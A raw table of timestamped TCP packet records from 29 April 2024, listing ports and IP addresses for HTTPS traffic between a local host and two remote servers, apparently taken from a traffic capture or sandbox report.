Apr 29, 2024 22:13:04.692732096 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.695034027 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.695085049 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.699512959 CEST	49742	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.699528933 CEST	443	49742	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.748866081 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.749892950 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.749903917 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.750277996 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.750371933 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.751539946 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.751602888 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.751811981 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.751821041 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.752409935 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.753989935 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.754077911 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.754189014 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.754693985 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.800113916 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.800128937 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.959703922 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:04.959785938 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.960150957 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.960164070 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:04.961798906 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:04.961806059 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:04.984635115 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.984680891 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.984723091 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.984775066 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.984787941 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.984798908 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.984855890 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.985620975 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.985647917 CEST	443	49744	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.985656977 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.985701084 CEST	49744	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.987628937 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.987679958 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.987709045 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.987725019 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.987742901 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.987787962 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.990652084 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.990709066 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.990756989 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.992881060 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.992892981 CEST	443	49745	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:04.992901087 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:04.992937088 CEST	49745	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:05.820447922 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.820499897 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.820513010 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.820528984 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.820547104 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.820601940 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.820607901 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.820635080 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.820647955 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.820725918 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.820887089 CEST	49743	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.820899010 CEST	443	49743	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.892280102 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.892313004 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:05.892410994 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.892875910 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:05.892890930 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:06.351727962 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:06.351813078 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.352257967 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.352263927 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:06.354187965 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.354192972 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:06.354283094 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.354291916 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:06.411825895 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:06.411864996 CEST	443	49749	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:06.411942005 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:06.412257910 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:06.412273884 CEST	443	49749	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:06.646408081 CEST	443	49749	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:06.646706104 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:06.646733999 CEST	443	49749	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:06.647070885 CEST	443	49749	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:06.647404909 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:06.647469997 CEST	443	49749	142.250.191.164	192.168.2.4
Apr 29, 2024 22:13:06.721333027 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:06.880106926 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.880151033 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:06.880208969 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.880563974 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:06.880578995 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:07.238293886 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:07.238568068 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:07.238665104 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:07.351958036 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:07.354867935 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.129137993 CEST	49748	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.129162073 CEST	443	49748	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.130891085 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.130916119 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.133394957 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.133399963 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.606050014 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.606081009 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.606098890 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.606271982 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.606271982 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.606306076 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.606358051 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.711632013 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.711679935 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.711744070 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.711771965 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.711903095 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.711903095 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.863595009 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.863621950 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.863704920 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.863745928 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.863760948 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.863785982 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.968987942 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.969005108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.969082117 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:08.969106913 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:08.969158888 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.047914982 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.047949076 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.048034906 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.048053026 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.048120022 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.105084896 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.105109930 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.105204105 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.105216980 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.105262041 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.152137041 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.152162075 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.152214050 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.152225018 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.152250051 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.152268887 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.195410013 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.195440054 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.195481062 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.195492983 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.195507050 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.195533991 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.241230965 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.241255999 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.241326094 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.241345882 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.241390944 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.286508083 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.286535978 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.286698103 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.286698103 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.286731005 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.286777020 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.324395895 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.324419975 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.324491978 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.324506998 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.324553013 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.351103067 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.351136923 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.351303101 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.351319075 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.351360083 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.377537966 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.377568007 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.377736092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.377736092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.377747059 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.377790928 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.399812937 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.399828911 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.399902105 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.399910927 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.399955034 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.424519062 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.424535036 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.424611092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.424628973 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.424673080 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.443861008 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.443876982 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.443953991 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.443968058 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.444013119 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.465692997 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.465713024 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.465770960 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.465781927 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.465791941 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.465827942 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.483361959 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.483380079 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.483441114 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.483453035 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.483473063 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.483494043 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.503180981 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.503201008 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.503262997 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.503272057 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.503314018 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.748724937 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.748744011 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.748924017 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.748951912 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.748965979 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749046087 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749057055 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749072075 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749083042 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749088049 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749181986 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749187946 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749244928 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749254942 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749277115 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749290943 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749296904 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749316931 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749325037 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749339104 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749350071 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749356031 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749368906 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749391079 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749396086 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749416113 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749420881 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749427080 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749440908 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749473095 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749474049 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749485016 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749505043 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749521971 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749531031 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749533892 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749547005 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749562979 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749566078 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749598026 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749603033 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749619007 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749624968 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749639988 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749643087 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749651909 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749661922 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749689102 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749697924 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749712944 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749769926 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749775887 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749783993 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749806881 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749806881 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749815941 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749831915 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749836922 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749850035 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749865055 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749866009 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749888897 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749893904 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749917984 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749922991 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749933958 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749974012 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.749982119 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.749990940 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.750010967 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.750158072 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.750158072 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.751295090 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.751311064 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.751364946 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.751372099 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.751415968 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.770248890 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.770266056 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.770426989 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.770440102 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.770486116 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.785243034 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.785265923 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.785320997 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.785330057 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.785358906 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.785387039 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.800983906 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.801002026 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.801093102 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.801103115 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.801151037 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.817543983 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.817559958 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.817635059 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.817645073 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.817687035 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.837049961 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.837069035 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.837141037 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.837147951 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.837186098 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.844403028 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.844418049 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.844594955 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.844602108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.844645977 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.857817888 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.857832909 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.857990980 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.857997894 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.858047962 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.869709015 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.869724989 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.869788885 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.869796038 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.869836092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.882155895 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.882172108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.882234097 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.882241011 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.882282019 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.893395901 CEST	443	49750	95.217.242.142	192.168.2.4
